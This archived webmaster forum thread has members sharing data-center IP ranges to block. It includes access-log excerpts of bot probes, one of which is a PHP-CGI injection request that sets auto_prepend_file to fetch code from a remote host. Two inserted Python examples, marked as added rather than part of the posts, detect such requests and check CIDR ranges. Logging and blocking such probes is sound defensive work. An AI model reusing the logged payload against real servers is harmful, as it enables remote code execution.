Server Farms - July 2015

Tracking and Reporting Data Center IP Ranges

         

Ocean10000

4:09 am on Jul 8, 2015 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Continuation of the Server Farm threads.

This is where we report data center IP ranges as they are discovered or change in the rapidly evolving assigned IP landscape.

Past server farm threads:

lucy24

12:30 am on Jul 10, 2015 (gmt 0)




OK, here's one:
103.42.180.136 - - [08/Jul/2015:17:40:29 -0700] "GET /data/admin/allowurl.txt HTTP/1.1" 404 2859 "-" "Mozilla/4.0 (compatible; myccs 5.5; Windows 98);baiduspider" 
103.42.180.136 - - [08/Jul/2015:17:40:38 -0700] "GET /uploads/allimg/index.html HTTP/1.1" 403 2859 "-" "Mozilla/4.0 (compatible; myccs 5.5; Windows 98);baiduspider"
103.42.180.136 - - [08/Jul/2015:17:40:48 -0700] "GET /plus/list.php HTTP/1.1" 403 2859 "-" "Mozilla/4.0 (compatible; myccs 5.5; Windows 98);baiduspider"
103.42.180.136 - - [08/Jul/2015:17:40:48 -0700] "GET /include/captcha/README.txt HTTP/1.1" 404 2859 "-" "Mozilla/4.0 (compatible; myccs 5.5; Windows 98);baiduspider"

For those who haven't been paying attention, 103 is APNIC's answer to 185. Free lookup says that
103.42.180.0/22
(a) belongs to China and (b) "1 website uses this address."

To block or not to block ... Gee, it's so tough to decide.

It took me a while to figure out that the reason requests #1 and #4 made it as far as a 404 was the .txt extension.

keyplyr

4:08 am on Jul 10, 2015 (gmt 0)




(a) belongs to China and (b) "1 website uses this address."
To block or not to block ... Gee, it's so tough to decide.

Looks like Shenzhen Yi Cloud Network (myhostadmin.cn) is a mixed services company - internet access, mobile network and hosting. That whopping "1 website" may be the only one there. But you know the Chinese... one today, a billion tomorrow!

Those GET requests appear to be the standard type probes usually seen by compromised accounts IMO. But then I'm biased; since I took down my Asia/Pacific blocks, my human traffic almost doubled and the increased revenue from AdSense has more than justified dealing with the occasional script threat from that region. I have other mechanisms in place for that.

keyplyr

9:31 am on Jul 10, 2015 (gmt 0)





sakura.ne.jp
112.78.112.0/20
112.78.112.0 - 112.78.127.255

Angonasec

2:12 pm on Jul 10, 2015 (gmt 0)



Knowing our Lucy, I think we can safely assume her question was indeed rhetorical :)

keyplyr

9:01 am on Jul 11, 2015 (gmt 0)





meerfarbig.de
185.44.104.0/22
185.44.104.0 - 185.44.107.255

keyplyr

9:05 am on Jul 12, 2015 (gmt 0)





owned-networks.net
104.244.152.0/21
104.244.152.0 - 104.244.159.255

keyplyr

9:10 am on Jul 16, 2015 (gmt 0)





stormweb.ca
207.112.70.0/24
207.112.70.0 - 207.112.70.255

xmission.com
207.135.128.0/19
207.135.128.0 - 207.135.159.255

wilderness

9:59 pm on Jul 16, 2015 (gmt 0)




XMission uses some sub-nets from WestNet, which I've omitted.
XMISSION-166-70-0-0 166.70.0.0 - 166.70.255.255 166.70.
XMISSION-207-135-128-0 207.135.128.0 - 207.135.159.255 207.135.128.0/19
XMISSION 68.69.160.0 - 68.69.175.255 68.69.160.0/20
XMISSION 2607:FA18:: - 2607:FA18:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF

keyplyr

12:03 am on Jul 17, 2015 (gmt 0)




Thanks Don, had all those :)

Posted since that respective range had changed since the last time I did a look-up.

keyplyr

8:34 am on Jul 17, 2015 (gmt 0)




Turhost.com
37.230.104.0/21
37.230.104.0 - 37.230.111.255
109.232.220.0/22
109.232.220.0 - 109.232.223.255

********

worldwidewebhosting.com
108.174.144.0/20
108.174.144.0 - 108.174.159.255

I assume by the name there are more DCs.

keyplyr

10:55 am on Jul 17, 2015 (gmt 0)




worldwidewebhosting.com admin ranges:
173.192.89.192/27
173.192.89.192 - 173.192.89.223

Reside at softlayer.com:
173.192.0.0/15
173.192.0.0 - 173.193.255.255

(Which *could* indicate they're a reseller.)

wilderness

12:28 pm on Jul 17, 2015 (gmt 0)




World Wide Web Hosting
WWWHL-NET-01 108.174.144.0 - 108.174.159.255 108.174.144.0/20
WWWHL-NET-02 162.210.48.0 - 162.210.51.255 162.210.48.0/22

In addition has six subnets within Astute Hosting ranges
ASTUTEHOSTING5 104.255.8.0 - 104.255.11.255 104.255.8.0/22
ASTUTEHOSTING4 104.37.72.0 - 104.37.75.255 104.37.72.0/22
ASTUTEHOSTING6 142.147.82.0 - 142.147.83.255 142.147.82.0/23
ASTUTEHOSTING2 162.213.156.0 - 162.213.159.255 162.213.156.0/22
ASTUTEHOSTING3 162.245.144.0 - 162.245.147.255 162.245.144.0/22
ASTUTEHOSTING 199.167.16.0 - 199.167.23.255 199.167.16.0/21
ASTUTEHOSTING 2607:D500:: - 2607:D500:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF

keyplyr

9:46 pm on Jul 17, 2015 (gmt 0)




Every time I read your IPv6 cut'n paste posts, my brain wants to write:
deny from F

wilderness

10:54 am on Jul 23, 2015 (gmt 0)




This is a useless thread from the perspective of search options!
I.e. Add2net [google.com]

Looking for PHP vulnerabilities via a range I did not have (my last saved accumulation was 2008).
AKA Lunar Pages.
Current ranges [whois.arin.net]

keyplyr

11:06 am on Jul 23, 2015 (gmt 0)




I just love it when I have all the ranges :)

keyplyr

5:53 am on Jul 25, 2015 (gmt 0)





sadecehosting.com
188.132.216.0/21
188.132.216.0 - 188.132.223.255

dstiles

1:38 pm on Jul 25, 2015 (gmt 0)




Not sure how good this is but may be useful. It claims to test IPs for the type of hosting, if any.

dedicatedornot.com

keyplyr

1:27 am on Jul 26, 2015 (gmt 0)




RE: dedicatedornot.com

Might come in handy for those sometimes questionable IPs where little indication is given through the normal sources. Thanks.

wilderness

11:16 am on Jul 26, 2015 (gmt 0)




Las Vegas NV Datacenter? or Premianet?
Root request only.
No supporting images.

RES-SERVERPOINT-01 173.254.190.8 - 173.254.190.15 173.254.190.8/29 (RagingWire Data 173.254.176.0 - 173.254.191.255 173.254.176.0/20)
PREMIANET 216.108.224.0 - 216.108.239.255 216.108.224.0/20
APH-LAS-NV1 64.235.32.0 - 64.235.63.255 64.235.32.0/19
PREMIANET 72.18.192.0 - 72.18.207.255 72.18.192.0/20

keyplyr

11:40 am on Jul 26, 2015 (gmt 0)




Thanks, had the 216.108.224.0/20 but not the others.

wilderness

2:39 pm on Jul 26, 2015 (gmt 0)




It's my recollection that there was a rather recent discussion on IBM Cloud, however no luck locating.

Anybody have any RIPE ranges on Softlayer?
This AM visitor is from Softlayer, however is used by IBM Cloud, and for a specific RIPE customer.
169.53.149.14 - - [26/Jul/2015:05:59:52 -0600] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp ://159 .122.141.239/i.txt HTTP/1.1" 403 635 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7"
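Added example, not part of the post above: one way to pull requests like this one out of an access log, by decoding the query string, looking for `-d name=value` switches, and checking the client address against a list of ranges. The watchlist, log lines, host names and function names are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

# Combined Log Format up to the status code; the target may contain spaces
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (.*?) HTTP/[\d.]+" (\d{3}) ')
# "-d name=value" is how the PHP command line sets an ini directive
INI_SWITCH_RE = re.compile(r'(?:^|\s)-d\s+([A-Za-z_.]+)\s*=\s*(\S+)')

# Constructed watchlist and log lines (documentation address ranges only)
WATCHLIST = [ipaddress.ip_network("198.51.100.0/24")]
SAMPLE_LOG = """\
198.51.100.14 - - [26/Jul/2015:05:59:52 -0600] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://example.invalid/i.txt HTTP/1.1" 403 635 "-" "Mozilla/5.0"
203.0.113.9 - - [26/Jul/2015:06:01:10 -0600] "GET /index.html?d=1 HTTP/1.1" 200 15708 "-" "Mozilla/5.0"
198.51.100.77 - - [26/Jul/2015:06:02:31 -0600] "GET / HTTP/1.1" 200 15708 "-" "Mozilla/5.0"
"""

def inspect(line):
    """Parse one log line; return None if it is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    # Decode %xx and '+' so the switches are visible as plain text
    query = unquote_plus(target.partition("?")[2])
    try:
        listed = any(ipaddress.ip_address(ip) in net for net in WATCHLIST)
    except ValueError:
        listed = False  # client field was a host name or malformed
    return {"ip": ip, "status": int(status), "listed": listed,
            "ini_overrides": dict(INI_SWITCH_RE.findall(query))}

def findings(log_text):
    """Return records that carry ini switches or come from a listed range."""
    hits = []
    for line in log_text.splitlines():
        rec = inspect(line)
        if rec and (rec["ini_overrides"] or rec["listed"]):
            rec["served"] = rec["status"] < 400  # True means it was not refused
            hits.append(rec)
    return hits

if __name__ == "__main__":
    for hit in findings(SAMPLE_LOG):
        print(hit)
```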

keyplyr

3:01 pm on Jul 26, 2015 (gmt 0)




Don't know which ones are RIPE (without squeezing them):


wilderness

5:24 pm on Jul 26, 2015 (gmt 0)




Many thanks

dstiles

7:49 pm on Jul 26, 2015 (gmt 0)




Softlayer RIPE (NL) (that I have)...

5.10.64.0 - 5.10.127.255
5.153.0.0 - 5.153.63.255
37.58.64.0 - 37.58.127.255
159.8.0.0 - 159.8.255.255
159.253.128.0 - 159.253.159.255

The above ranges 174.140... combine to...

174.140.0.0 - 174.140.63.255
174.140.0.0/18
Cyber Fusion Systems

keyplyr

12:54 am on Jul 27, 2015 (gmt 0)




@dstiles thanks for the info. They formerly were assigned to SoftLayer. I have them cut-up like that mostly because of the mobile app traffic coming through clouds, which I merely cut'n pasted quickly for Don.

Probably time for another mass validation check of all the ranges I manipulate. Did one last year and found approx 20 had changed ownership, but remained same category and a few that were no longer used for anything related to the former company.

not2easy

4:29 pm on Jul 28, 2015 (gmt 0)

WebmasterWorld Administrator 10+ Year Member Top Contributors Of The Month



Update/Correction for BTN server
In case I (or others) missed an update, a CIDR given here last Sept (!) just showed up, but my whois utility shows a different CIDR which seems to be the correct one. This is for "Beyond The Network" range:
BTN-CIDR4 209.8.0.0 - 209.9.255.255 209.8.0.0/16
which was posted last Sept. here, my lookup shows:
BTN-CIDR4 209.8.0.0 - 209.9.255.255 209.8.0.0/15
which looks right since the range does not end with 209.8.255.255 but covers all of 209.9. too.
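Added example, not part of the post above: a check that a posted "start - end" range and the CIDR written beside it describe the same block, which catches the /16 versus /15 discrepancy discussed here. It goes beyond that one case by also flagging CIDRs that are too wide or not aligned to their prefix; the function names and the EXAMPLE-NET line are constructed, the other sample lines use values from the thread.

```python
import ipaddress
import re

# "start - end cidr" as posted in the thread, with an optional net name in front
ENTRY_RE = re.compile(r'([0-9A-Fa-f:.]+)\s+-\s+([0-9A-Fa-f:.]+)\s+([0-9A-Fa-f:.]+/\d+)')

# First three lines use values from the thread; the last one is constructed.
SAMPLE = """\
BTN-CIDR4 209.8.0.0 - 209.9.255.255 209.8.0.0/16
BTN-CIDR4 209.8.0.0 - 209.9.255.255 209.8.0.0/15
WWWHL-NET-02 162.210.48.0 - 162.210.51.255 162.210.48.0/22
EXAMPLE-NET 192.0.2.8 - 192.0.2.23 192.0.2.8/28
"""

def audit_range(start, end, cidr):
    """Return (verdict, exact_cidrs) for one posted range and its CIDR."""
    try:
        first, last = ipaddress.ip_address(start), ipaddress.ip_address(end)
    except ValueError:
        return "bad-range", []
    if first.version != last.version or first > last:
        return "bad-range", []
    # The minimal list of CIDR blocks that covers exactly first..last
    exact = list(ipaddress.summarize_address_range(first, last))
    exact_s = [str(n) for n in exact]
    try:
        net = ipaddress.ip_network(cidr, strict=True)
    except ValueError:
        return "invalid-cidr", exact_s       # host bits set, or malformed
    if net.version != first.version:
        return "bad-range", exact_s
    if [net] == exact:
        return "match", exact_s
    if first <= net[0] and net[-1] <= last:
        return "cidr-too-narrow", exact_s    # a deny rule would miss part of the range
    if net[0] <= first and last <= net[-1]:
        return "cidr-too-wide", exact_s      # a deny rule would hit other networks
    return "mismatch", exact_s

def audit_lines(text):
    """Audit every line that contains a 'start - end cidr' entry."""
    results = []
    for line in text.splitlines():
        m = ENTRY_RE.search(line)
        if m:
            results.append((m.group(3),) + audit_range(*m.groups()))
    return results

if __name__ == "__main__":
    for cidr, verdict, exact in audit_lines(SAMPLE):
        print(f"{cidr:18} {verdict:16} exact: {', '.join(exact)}")
```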

keyplyr

8:35 pm on Jul 28, 2015 (gmt 0)




I had it as /15 as well. Thanks for the heads-up. Always good to give things a second look :)

keyplyr

11:40 am on Aug 10, 2015 (gmt 0)




Got hit from a new Sakura range. Scraped HTML & image files:

160.16.119.123 - - [10/Aug/2015:03:07:43 -0700] "GET /example.html HTTP/1.1" 200 15708 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"

Which brings my Sakura list to:

49.212.0.0/16
49.212.0.0 - 49.212.255.255

59.106.0.0/16
59.106.0.0 - 59.106.255.255

112.78.112.0/20
112.78.112.0 - 112.78.127.255

160.16.0.0/16 (new)
160.16.0.0 - 160.16.255.255

182.48.0.0/18
182.48.0.0 - 182.48.63.255

219.94.128.0/17
219.94.128.0 - 219.94.255.255

keyplyr

1:35 pm on Aug 10, 2015 (gmt 0)




Even after I blocked the bot ^above^ it continues eating thousands of 403s, going on 3 hours now.